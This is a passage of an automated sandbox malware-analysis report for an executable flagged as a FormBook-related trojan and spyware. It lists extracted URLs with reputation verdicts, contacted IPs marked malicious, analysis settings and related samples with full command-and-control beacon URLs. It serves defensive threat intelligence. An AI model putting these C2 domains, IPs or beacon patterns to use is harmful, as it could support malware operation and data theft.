                                    http://www.techwithsun.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.vns96.net/bpg5/www.vns96.netUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.haynicorpon.bizexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.mysparexrewards.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.rt66omm.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.gomarketing.infoexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.perkibeans.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ctldl.windowsupctionSettingsWWAHost.exe, 00000004.00000002.820630497.0000000008380000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.perkibeans.com/bpg5/www.perkibeans.comUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fabricadepack.fun/bpg5/www.fabricadepack.funUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.vns96.netexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jhg61.com/bpg5/?lpw7=pOb1wbOKbC6m5caeF5Aq0gkUNx4nmyWWAHost.exe, 00000004.00000002.813585736.0000000003750000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.813585736.000000000374A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.fabricadepack.funexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.gomarketing.info/bpg5/www.gomarketing.infoUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.wearecatalyst.appexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.thetowerbells.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.827964090.000000000E816000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.musicandgros.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.mysparexrewards.com/bpg5/explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoWWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drfalse
                                      		high
                                      http://www.bisarropainting.com/bpg5/www.bisarropainting.comUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jhg61.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.berlinhealthweek.com/bpg5/explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://www.antalyabfe.com/bpg5/?lpw7=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3explorer.exe, 00000003.00000002.828968378.0000000016EDC000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.819975180.0000000004B6C000.00000004.10000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.fabricadepack.fun/bpg5/explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000003.00000002.833320353.00007FF883839000.00000002.00000001.01000000.0000000A.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.bisarropainting.comADexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-15B7L5MNM.4.drfalse
                                        		high
                                        http://www.42230.orgIexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchWWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drfalse
                                          		high
                                          http://www.perkibeans.com)Bexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.42230.orgexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=WWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drfalse
                                            		high
                                            http://www.musicandgros.com/bpg5/www.musicandgros.comUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.berlinhealthweek.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=-15B7L5MNM.4.drfalse
                                              		high
                                              https://search.yahoo.com?fr=crmas_sfpWWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drfalse
                                                		high
                                                http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.42230.org/bpg5/www.42230.orgUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.42230.org/bpg5/explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.antalyabfe.com/bpg5/www.antalyabfe.comUZCu=zJfEuRXw-Pexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://rt66omm.com/bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVfexplorer.exe, 00000003.00000002.828968378.0000000017200000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.819975180.0000000004E90000.00000004.10000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.thetowerbells.com/bpg5/www.thetowerbells.comexplorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.bisarropainting.com/bpg5/explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-15B7L5MNM.4.drfalse
                                                  		high
                                                  http://www.bisarropainting.comexplorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  130.185.109.77
                                                  		www.berlinhealthweek.comGermany
                                                  		51191XIRRADEtrue
                                                  81.169.145.93
                                                  		musicandgros.comGermany
                                                  		6724STRATOSTRATOAGDEtrue
                                                  188.114.96.7
                                                  		www.antalyabfe.comEuropean Union
                                                  		13335CLOUDFLARENETUStrue
                                                  198.177.124.57
                                                  		www.gomarketing.infoUnited States
                                                  		395681FINALFRONTIERVGtrue
                                                  185.134.245.113
                                                  		www.thetowerbells.comNorway
                                                  		12996DOMENESHOPOsloNorwayNOtrue
                                                  118.27.125.172
                                                  		www.rt66omm.comJapan7506INTERQGMOInternetIncJPtrue
                                                  104.194.229.198
                                                  		www.vns96.netUnited States
                                                  		35916MULTA-ASN1UStrue
                                                  183.90.228.46
                                                  		www.haynicorpon.bizJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                  150.129.40.9
                                                  		www.jhg61.comHong Kong
                                                  		132422TELECOM-HKHongKongTelecomGlobalDataCentreHKtrue

                                                  Private

                                                  IP
                                                  192.168.2.1

                                                  General Information

                                                  Joe Sandbox Version:37.1.0 Beryl
                                                  Analysis ID:875301
                                                  Start date and time:2023-05-25 11:34:42 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 9m 59s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:4
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample file name:P5348574_74676.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@11/10
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 72.9% (good quality ratio 66.5%)
                                                  • Quality average: 71.5%
                                                  • Quality standard deviation: 32.2%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 58
                                                  • Number of non-executed functions: 162
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): audiodg.exe
                                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: P5348574_74676.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  11:35:41API Interceptor1x Sleep call for process: P5348574_74676.exe modified
                                                  11:35:58API Interceptor868x Sleep call for process: explorer.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  130.185.109.77535276_86376.exeGet hashmaliciousFormBookBrowse
                                                  • www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm
                                                  Product_List.exeGet hashmaliciousFormBookBrowse
                                                  • www.berlinhealthweek.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==
                                                  PS_231.exeGet hashmaliciousFormBookBrowse
                                                  • www.berlinhealthweek.com/bpg5/?kyx=IT_WJ&HqE8Cy=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
                                                  KD_MEDICAL_POLSKA_23053371.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.die-cyber-versicherer.com/co9t/?LVuSGU=-giyq0&MGuik=O0wiA489QXAo4/zisxW0kKpRL90vV9sT3USeBzF+d48ZKZIeaBWCTOAUxMvYVu20Q54TxHeRRe+2rSLSyytqRGlmgBV+voPflw==
                                                  s4YvlK74zJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.die-cyber-versicherer.com/co9t/?h1=O0wiA489QXAo4/zisxW0kKpRL90vV9sT3USeBzF+d48ZKZIeaBWCTOAUxMvYVu20Q54TxHeRRe+2rSLSyytqRGlmgBV+voPflw==&m8hK_F=yFTUihtd4y
                                                  24Hdkz2sGxG1Xq0.exeGet hashmaliciousFormBookBrowse
                                                  • www.berlinhealthweek.com/bpg5/?Bjk=Fjw7NbIMlZ8ijMXD&67FoqNQb=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==
                                                  Project6531678ZXGT7E.exeGet hashmaliciousFormBookBrowse
                                                  • www.berlinhealthweek.com/bpg5/?lN=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k4SHQdXkalH8+fUZT81zR875Z&g6tdKQ=x7tw
                                                  Product_2798679039798.exeGet hashmaliciousFormBookBrowse
